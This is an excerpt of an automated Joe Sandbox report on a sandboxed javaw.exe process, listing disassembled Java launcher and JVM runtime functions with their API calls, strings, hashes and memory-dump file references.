Instruction ID: 6db8c19b545d8608998d08c3bc5203299f7af7e3f2328de48a825f5f53cd310f
Opcode Fuzzy Hash: 7ac90fe91553d3f5149d0b3ebac8d7ffc138b72533f8d251d1f8d3b48f293454
Instruction Fuzzy Hash: A3A14332A141189FCF199F68DCA6BED3BF1AB46324F181149F811BF392CB358986CB51

Function 00E04C71 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 113
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00E04D6B
GetExitCodeThread.KERNEL32(00000000,?), ref: 00E04D77
CloseHandle.KERNEL32(00000000), ref: 00E04D7E

Part of subcall function 00E16E40: CreateThread.KERNEL32 ref: 00E16E89
Part of subcall function 00E16E40: GetLastError.KERNEL32 ref: 00E16E95
Part of subcall function 00E16E40: __dosmaperr.LIBCMT ref: 00E16E9C

Strings

J2D_D3D, xrefs: 00E04CCB
true, xrefs: 00E04D32
false, xrefs: 00E04B3B, 00E04CD5, 00E04CDF, 00E04D03
preloadD3D, xrefs: 00E04D57
`!, xrefs: 00E04C89
J2D_D3D_PRELOAD, xrefs: 00E04CF2

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleWait__dosmaperr
String ID: J2D_D3D$J2D_D3D_PRELOAD$`!$false$preloadD3D$true
API String ID: 3940475429-4122690914
Opcode ID: c4456e3d4276228e7e45efaff655e829bed60e95acf4c401de61f3bcfe66d46f
Instruction ID: cb7993f08567e85302da934d9f6fb190f0d917fb63a13c1bdaae52addee31fd8
Opcode Fuzzy Hash: c4456e3d4276228e7e45efaff655e829bed60e95acf4c401de61f3bcfe66d46f
Instruction Fuzzy Hash: 2631E6F250431ABFD72C9B61ED45E6A7BE8EF88364F14662DF602B21D0DB3088848A11

Function 6D587F20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6D588042

Strings

AllocateHeap, xrefs: 6D588006
ParkEventFreeListAllocate, xrefs: 6D587F27
invariant, xrefs: 6D587F66, 6D58804F
guarantee(ev->AssociatedWith == NULL) failed, xrefs: 6D587F6B
C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\memory/allocation.inline.hpp, xrefs: 6D588017
C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\runtime\park.cpp, xrefs: 6D587F72
guarantee(_ParkHandle != NULL) failed, xrefs: 6D588054
C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\os\windows\vm\os_windows.hpp, xrefs: 6D58805E

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: CreateEvent
String ID: AllocateHeap$C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\os\windows\vm\os_windows.hpp$C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\memory/allocation.inline.hpp$C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\runtime\park.cpp$ParkEventFreeListAllocate$guarantee(_ParkHandle != NULL) failed$guarantee(ev->AssociatedWith == NULL) failed$invariant
API String ID: 2692171526-846076126
Opcode ID: a1dc37578fd6db48af5479ff18b64bfa42fcf7393401e436f327215d8912ad51
Instruction ID: 34a9a1a08a675718af8015d759574217490539265777a5ad8435919da662dd52
Opcode Fuzzy Hash: a1dc37578fd6db48af5479ff18b64bfa42fcf7393401e436f327215d8912ad51
Instruction Fuzzy Hash: 18410370D41720DFD720CF65DC15766BAF0AB48719F00092DE904A7B82E3B5A9448FC7

Function 00E05D3B Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 41
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E05DB0: _strlen.LIBCMT ref: 00E05DF4
Part of subcall function 00E05DB0: _strlen.LIBCMT ref: 00E05DFC
Part of subcall function 00E05DB0: _strlen.LIBCMT ref: 00E05E08
Part of subcall function 00E05DB0: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000), ref: 00E05E50
Part of subcall function 00E05DB0: _strlen.LIBCMT ref: 00E05E78
Part of subcall function 00E05DB0: _strlen.LIBCMT ref: 00E05E80
Part of subcall function 00E05DB0: _strlen.LIBCMT ref: 00E05E8C

LoadLibraryA.KERNEL32(?,?,00E01EF6,?,00000000), ref: 00E05D55
GetProcAddress.KERNEL32(00000000,JNI_CreateJavaVM), ref: 00E05D73
GetProcAddress.KERNEL32(00000000,JNI_GetDefaultJavaVMInitArgs), ref: 00E05D85

Part of subcall function 00E05AE8: __vsnprintf.LIBCMT ref: 00E05B1A
Part of subcall function 00E05AE8: MessageBoxA.USER32(00000000,00000000,Java Virtual Machine Launcher,00000010), ref: 00E05B30

Strings

Error: can't find JNI interfaces in: %s, xrefs: 00E05DA0
JNI_CreateJavaVM, xrefs: 00E05D6D
JVM path is %s, xrefs: 00E05D40
JNI_GetDefaultJavaVMInitArgs, xrefs: 00E05D7D
Error: loading: %s, xrefs: 00E05D65

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen$AddressLibraryLoadProc$Message__vsnprintf
String ID: Error: can't find JNI interfaces in: %s$Error: loading: %s$JNI_CreateJavaVM$JNI_GetDefaultJavaVMInitArgs$JVM path is %s
API String ID: 941717925-3810690643
Opcode ID: 8de1539883f6f893a00c474d689b588eabbefc54014549bae8c4a396c19f6c22
Instruction ID: a9e49cc522a57b29d3f8e8a1e0e72256529c4114d593afc63558971f19fc9b02
Opcode Fuzzy Hash: 8de1539883f6f893a00c474d689b588eabbefc54014549bae8c4a396c19f6c22
Instruction Fuzzy Hash: 68F06233148716BFCB202BA0EC0995B7BE5AB84710F18642AF848711A1DB7694D59F16

Function 00E05702 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E05686: GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,00E05723,?,?), ref: 00E05694
Part of subcall function 00E05686: _strrchr.LIBCMT ref: 00E0569D
Part of subcall function 00E05686: _strrchr.LIBCMT ref: 00E056A7

_strlen.LIBCMT ref: 00E05760

Strings

Error: could not find java.dll, xrefs: 00E057E3
%s\jre\bin\java.dll, xrefs: 00E0577B
Insufficient space to store JRE path, xrefs: 00E0576E
\jre, xrefs: 00E057A7
JRE path is %s, xrefs: 00E057B3, 00E057D4
%s\bin\java.dll, xrefs: 00E0572E

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strrchr$FileModuleName_strlen
String ID: %s\bin\java.dll$%s\jre\bin\java.dll$Error: could not find java.dll$Insufficient space to store JRE path$JRE path is %s$\jre
API String ID: 2361563253-1991644070
Opcode ID: 93a100883306d99d848b10032b4f77c0a375093da74416bb87704f38e14213d7
Instruction ID: 8d62d4d7656cbca18398c7647467193565b186f2b75f98db49eb3f3db6d8fc2f
Opcode Fuzzy Hash: 93a100883306d99d848b10032b4f77c0a375093da74416bb87704f38e14213d7
Instruction Fuzzy Hash: 6621C233945728B6CA10BBA0AC43DDF3BEC9F05710F582096F444B61C2EE209BC59EA6

Function 00E1743F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00E17350), ref: 00E17461
GetFileInformationByHandle.KERNEL32(?,?), ref: 00E174BB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00E17350,?,000000FF,00000000,?), ref: 00E17549
__dosmaperr.LIBCMT ref: 00E17550
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00E1758D

Part of subcall function 00E177B5: __dosmaperr.LIBCMT ref: 00E177EA

Strings

Ps, xrefs: 00E17459

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID: Ps
API String ID: 1206951868-4085833087
Opcode ID: ee52e9b68a47d1cda5e5bac0cf3b4934b0ace4feb2b0e5054abfb543ac9fc509
Instruction ID: 9636496d5c5124392a4c20909b209485a4fd8499ea5640d68ceb3b0c598c3e84
Opcode Fuzzy Hash: ee52e9b68a47d1cda5e5bac0cf3b4934b0ace4feb2b0e5054abfb543ac9fc509
Instruction Fuzzy Hash: EC412971914204AFDB249FB6DC459EBBBFAEF88700B14642DF896E3651E6309984CB20

Function 6D5E7F50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,6D52CA49,6D51E320,00000000), ref: 6D5E7F8B
_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,6D5EA340, Qm,00010004, Qm,?,6D52CA49,6D51E320,00000000), ref: 6D5E7FF8
_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,6D5EA340, Qm,00000004,?), ref: 6D5E8017
CloseHandle.KERNEL32(?), ref: 6D5E802A

Strings

Qm, xrefs: 6D5E7F99, 6D5E7FEF, 6D5E800E
Qm, xrefs: 6D5E7FE6, 6D5E7FE9

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: _beginthreadex$CloseCreateEventHandle
String ID: Qm$ Qm
API String ID: 3455102670-2438590901
Opcode ID: 6d88811ecc9b5c13e683a3df808dd9ecfa5f17f61262dd9595cc58e384d0d88d
Instruction ID: 588fd07bffcbb9577fc2adb40e736c4a7e8ff8c740aab5b28e2dd9c8c5b44e4b
Opcode Fuzzy Hash: 6d88811ecc9b5c13e683a3df808dd9ecfa5f17f61262dd9595cc58e384d0d88d
Instruction Fuzzy Hash: 5D41D371A04306AFEB14EF658C44FAABBB4EF41795F004469F904DB682E371D900CB92

Function 00E1AE2C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,F3FD1227,?,00E1AF3B,?,?,00000000), ref: 00E1AEED

Strings

ext-ms-, xrefs: 00E1AE97
api-ms-, xrefs: 00E1AE83

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: c2085547068f4cce5348c3b8e73d7c2888432bee82250a88501bef4d9ccdcebb
Instruction ID: 0950490f48e61514a3c914c20cb37028357add9973c435305d62e88f09615b96
Opcode Fuzzy Hash: c2085547068f4cce5348c3b8e73d7c2888432bee82250a88501bef4d9ccdcebb
Instruction Fuzzy Hash: 3921F671A02215AFC7319761EC44EEA3768EF01764F192531FC15B7290D730EDC5C6A1

Function 6FABF1DC Relevance: 9.8, APIs: 4, Strings: 2, Instructions: 771stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6FABF21B
strcmp.MSVCRT ref: 6FABF3F7
strlen.MSVCRT ref: 6FABF652
strlen.MSVCRT ref: 6FABF65E

Part of subcall function 6FA8FBA3: strlen.MSVCRT ref: 6FA8FBB7

Part of subcall function 6FA7BF2A: strlen.MSVCRT ref: 6FA7BF37

Strings

rnal, xrefs: 6FABF8BC
@, xrefs: 6FABF2C7

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: strlen$strcmp
String ID: @$rnal
API String ID: 551667898-826727331
Opcode ID: fdc3d8191d5a4a506da260a259cbcc1f58cda8e3d4045d095243fed6151ede2b
Instruction ID: 14cbab8b1cf0d39053995cac14b63b1743f06260b8ddd843da04d17a909d2157
Opcode Fuzzy Hash: fdc3d8191d5a4a506da260a259cbcc1f58cda8e3d4045d095243fed6151ede2b
Instruction Fuzzy Hash: B882D578A04355CFEB20CF68C984B89BBF5BF45308F0885ADD8589B292D779A9C4CF51

Function 6FAC0CFE Relevance: 9.5, APIs: 4, Strings: 2, Instructions: 455COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 6FAC0E51
memcmp.MSVCRT ref: 6FAC0E9C
memcmp.MSVCRT ref: 6FAC0F0E
memcmp.MSVCRT ref: 6FAC1134

Strings

SQLite format 3, xrefs: 6FAC0E91
0, xrefs: 6FAC111D

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: memcmp
String ID: 0$SQLite format 3
API String ID: 1475443563-3388949527
Opcode ID: 4805d36e176d91d8b152242dbe735428a8dfafbeb938379d8460bf16ec50bc46
Instruction ID: 951d2f11ff47fd88b8e8e0623293b2cf7daac7e730cf7938ff8a4a5edff0d07b
Opcode Fuzzy Hash: 4805d36e176d91d8b152242dbe735428a8dfafbeb938379d8460bf16ec50bc46
Instruction Fuzzy Hash: 0712ACB4A04344CFDB11CF68C580B9ABBF1AF45314F19856AD899DB356D738E8C5CB42

Function 00E19C48 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16d6301a935716e0db70f901249be0e56fdbd3ef2f8f550deee295a749a4815e
Instruction ID: b4ddd096413d7829c5c38540c2bdc40ccd3070791d67f6f65f1a8c6c850c2b6b
Opcode Fuzzy Hash: 16d6301a935716e0db70f901249be0e56fdbd3ef2f8f550deee295a749a4815e
Instruction Fuzzy Hash: E5B1CF70A04249AFDB11DFA9D861BFDBBF1AF49314F186158E441BB293C7719982CB90

Function 00E256F6 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 408timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00E25B3B,00000000,00000000,00000000), ref: 00E259FA

Strings

Eastern Standard Time, xrefs: 00E25A93
Eastern Summer Time, xrefs: 00E25AA7
C[, xrefs: 00E259D0, 00E259D3
;[, xrefs: 00E2592A, 00E258E3

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: InformationTimeZone
String ID: ;[$C[$Eastern Standard Time$Eastern Summer Time
API String ID: 565725191-1090443164
Opcode ID: ad63dd1daf066be2301179a5d4b1a4da1b51c150cdafa4c8db4d8cc29a45f7f2
Instruction ID: 1fdafd324e4267b1cd59f65845eed26cb64d75b1d4261edda346d40064b11a52
Opcode Fuzzy Hash: ad63dd1daf066be2301179a5d4b1a4da1b51c150cdafa4c8db4d8cc29a45f7f2
Instruction Fuzzy Hash: C3C1F5B3900635EBCB24AB64EE46ABE7BB9EF44710F145066F941B7191E7708E81CB90

Function 00E25988 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 156timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E1AD8A: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2120D,?,00000000,?,?,00E21232,?,00000007,?,?,00E21632,?,?), ref: 00E1ADA0
Part of subcall function 00E1AD8A: GetLastError.KERNEL32(?,?,00E2120D,?,00000000,?,?,00E21232,?,00000007,?,?,00E21632,?,?), ref: 00E1ADAB

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00E25B3B,00000000,00000000,00000000), ref: 00E259FA

Strings

Eastern Standard Time, xrefs: 00E25A93
Eastern Summer Time, xrefs: 00E25AA7
C[, xrefs: 00E259D0, 00E259D3

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone
String ID: C[$Eastern Standard Time$Eastern Summer Time
API String ID: 3335090040-4252495105
Opcode ID: 6b36177253d4b2a9a4d25e86145d63c0daf0ccb9b57f25d90ba81395d67c7c12
Instruction ID: cec06f0b5c37408d9af2ca1ba945e5682584c77c5dc9b274a741426f227fad34
Opcode Fuzzy Hash: 6b36177253d4b2a9a4d25e86145d63c0daf0ccb9b57f25d90ba81395d67c7c12
Instruction Fuzzy Hash: 6741C3B3801628EACB24AF75EE4A99E7FF8EF01360B155166E454B71A1EB308944CB91

Function 6D52B1A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6D52B1BF
jio_snprintf.JVM(?,00000400,%s: %s,?,?,00000006), ref: 6D52B278

Strings

C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp, xrefs: 6D52B2A5
%s: %s, xrefs: 6D52B267

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
